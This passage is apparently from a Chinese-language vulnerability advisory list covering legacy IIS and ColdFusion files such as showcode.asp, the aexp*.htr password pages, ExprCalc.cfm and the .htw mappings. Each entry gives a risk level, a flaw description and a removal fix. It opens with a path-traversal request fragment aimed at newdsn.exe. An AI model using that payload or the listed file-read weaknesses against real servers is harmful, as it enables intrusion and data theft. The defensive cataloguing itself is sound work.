&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
建議:禁止對/scripts/tools目錄的匿名訪問
解決方法:刪除newdsn.exe文件
類型:信息型
名字:showcode.asp_3
風險等級:中
描述:在/iissamples/exair/howitworks/存在code.asp文件,入侵者利用
該文件可以查看服務器硬盤上任何一個ASCII文件的內容,并顯示asp
程序文件的源代碼
建議:禁止對/iissamples的web目錄的匿名訪問
解決方法:刪除showcode.asp文件
類型:攻擊型
名字:aexp.htr
風險等級:中
描述:在/iisadmpwd目錄下存在aexp.htr文件,類似的還有aexp2.htr,
aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
解和修改NT用戶的密碼。
建議:建議禁止對/iisadmpwd目錄的訪問
解決方法:刪除aexp.htr文件
類型:攻擊型
名字:aexp2.htr
風險等級:中
描述:在/iisadmpwd目錄下存在aexp2.htr文件,類似的還有aexp2.htr,
aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
解和修改NT用戶的密碼。
建議:建議禁止對/iisadmpwd目錄的訪問
解決方法:刪除aexp2.htr文件
類型:攻擊型
名字:aexp3.htr
風險等級:中
描述:在/iisadmpwd目錄下存在aexp3.htr文件,類似的還有aexp2.htr,
aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
解和修改NT用戶的密碼。
建議:建議禁止對/iisadmpwd目錄的訪問
解決方法:刪除aexp3.htr文件
類型:攻擊型
名字:aexp4b.htr
風險等級:中
描述:在/iisadmpwd目錄下存在aexp4b.htr文件,類似的還有aexp2.htr,
aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
解和修改NT用戶的密碼。
建議:建議禁止對/iisadmpwd目錄的訪問
解決方法:刪除aexp4b.htr文件
類型:攻擊型
名字:achg.htr
風險等級:中
描述:在/iisadmpwd目錄下存在aechg.htr文件,類似的還有aexp2.htr,
aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破
解和修改NT用戶的密碼。
建議:建議禁止對/iisadmpwd目錄的訪問
解決方法:刪除achg.htr文件
類型:攻擊型
名字:ExprCale.cfm
風險等級:中
描述:在Coldfusion的web目錄:/cfdocs/expeval/ExprCalc.cfm文件,這
個文件有個漏洞允許用戶讀取服務器硬盤上的任意文件包括用戶密
碼數據庫sam文件
建議:刪除相關的文件
解決方法:刪除ExprCalc.cfm文件
類型:攻擊型
名字:getfile.cfm
風險等級:中
描述:在Coldfusion的web目錄:/getfile.cfm文件,這個文件有個漏洞允
許用戶讀取服務器硬盤上的任意文件包括用戶密碼數據庫sam文件
建議:刪除相關的文件
解決方法:刪除getfile.cfm文件
類型:信息型
名字:x.htw
風險等級:中
描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
件,數據庫文件,和ASP源代碼。
建議在IIS控制臺中刪除無用的應用程序映射
類型:信息型
名字:qfullhit.htw
風險等級:中
描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
件,數據庫文件,和ASP源代碼。
建議:建議在IIS控制臺中刪除無用的應用程序映射
類型:信息型
名字:iirturnh.htw
風險等級:中
描述:IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用于Inde
xServer的點擊功能的。盡管你不運行IndexServer,該映射仍然有
效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文
件,數據庫文件,和ASP源代碼。
建議:建議在IIS控制臺中刪除無用的應用程序映射
文章來源于領測軟件測試網 http://www.kjueaiud.com/